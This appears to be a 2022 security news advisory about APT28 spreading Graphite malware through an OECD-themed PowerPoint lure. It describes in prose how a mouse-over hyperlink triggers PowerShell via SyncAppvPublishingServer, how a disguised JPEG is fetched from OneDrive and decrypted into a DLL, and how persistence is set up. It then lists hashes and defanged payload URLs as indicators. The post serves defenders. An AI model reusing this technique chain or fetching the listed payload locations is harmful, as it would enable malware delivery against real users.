Threat Actors Utilize PowerPoint Files to Distribute Graphite Malware

Home/malicious cyber actors, Malicious extension, Malware, Security Advisory, Security Update/Threat Actors Utilize PowerPoint Files to Distribute Graphite Malware

Threat Actors Utilize PowerPoint Files to Distribute Graphite Malware

Threat actors started utilizing PowerPoint presentations as a code execution method and delivering Graphite malware in targeted attacks.

APT28 (Fancy Bear), a threat actor group linked to Russia, has recently been seen using the method to distribute the Graphite malware. The file is allegedly linked to an economic progress organization, OECD; it contains instructions in English and French for using the Zoom app’s “interpretation” feature. 

The mouse-over technique is being leveraged to spread Graphite malware. 

The attackers lure with a PowerPoint (.PPT) file, which is allegedly linked to the Organization for Economic Co-operation and Development (OECD). The PPT file contains two slides with instructions in English and French. The PPT file contains a hyperlink that serves as a trigger for launching a malicious PowerShell script using the SyncAppvPublishingServer utility.

As soon as the victim moves the mouse over a hyperlink while trying to open the lure document, a malicious PowerShell script is activated to download a JPEG file (“DSC0002.jpeg”) from a Microsoft OneDrive account.

The JPEG, an encrypted DLL file (lmapi2.dll) is decrypted and dropped in the ‘C:\ ProgramData\’ directory. It is later executed via rundll32.exe while a registry key, which guarantees the persistence, will also be created for the DLL.

The goal of Graphite malware is to make it possible for the attacker to insert other malware into the system memory. 

According to Cluster25, if a new file is identified, the content is downloaded and decrypted by an AES-256-CBC decryption algorithm. The malware also permits remote code execution by creating a new memory region and carrying out the incoming shellcode by invoking a new dedicated thread. 

Graphite Malware IoCs

MD5:

  • c0060c0741833af67121390922c44f91
  • ef1288de782e65d6e5bd6a327157988f
  • 2ff3e6c9244ef965295aa60879d1aa6b
  • 9a915313d02345e149e6ba566fe85c47

SHA1:

  • 9cd7f14d85814c48be3fbf73891415978a7aa882 
  • 622eb93e34445c752eeaa623ef9ac6978e58f2fc 
  • a23efb6aa5a242c61c5d50a967a8f29da164c954 
  • 4c813ad68f2f1da6b2c59d11ad983cfa65e1a187
  • 4c813ad68f2f1da6b2c59d11ad983cfa65e1a187

SHA256:

  • 34aca02d3a4665f63fddb354551b5eff5a7e8877032ddda6db4f5c42452885ad 
  • efa5b49bdd086125b2b7d4058d09566f1db5f183c2a6332c597322f85107667a
  • d1bceccf5d2b900a6b601c612346fdb3fa5bb0e2faeefcac3f9c29dc1d74838d 
  • Be180a7c43734b7125b2d5cea7edd0174811a58113b048f5fe687db52db47fe3

Domain:

  • 9b5uja[.]am[.]files[.]1drv.com
  • kdmzlw[.]am[.]files[.]1drv[.]com

URL:

  • hxxps://9b5uja[.]am[.]files[.]1drv[.]com/y4mpYJ245I931DUGr7BV-dwLD7SReTqFr1N7eQOKSH_ug2G18Jd6i3SRqYqgugj3FA2JQQ7JqclvWH13Br3B5Ux-F6QcqADr-FowC_9PZi1Aj7uckcK8Uix_7ja1tF6C_8-5xYgm6zwjbXsrlEcTEenAyA8BzEaGPudutl1wMDkzVr6Wmn8_qRmYejLgbNoQmPTUe3P5NKFFLRjeeU_JhvA/DSC0002[.]jpeg?download
  • hxxps://kdmzlw[.]am[.]files[.]1drv[.]com/y4mv4glUgvW9nl8z8GU71PhPw0oRtve9QpZ0pEgwJN1q_TlGY5yl5Mvkrc5rUh0Uxxknlr1qymWyCbPrkKOFgL4CARScSn9UMhq3c5hSNOQsDOamYLmOfN61lUtQO10vxtn0I7QROJdOtQ42wDsaiACGR5ZrmYwt0SmZkphGWQpT2gOFrsUxjg8_7QT01VTABiGr3T6xpWrTmFT5yu4toQ/DSC0001[.]jpeg?download

Follow Us on: Twitter, InstagramFacebook to get the latest security news!

Post Views: 335
By | 2022-09-28T15:31:44+05:30 September 28th, 2022|malicious cyber actors, Malicious extension, Malware, Security Advisory, Security Update|

About the Author:

FirstHackersNews- Identifies Security

Related Posts

Leave A Comment

Subscribe to our newsletter to receive security tips everday!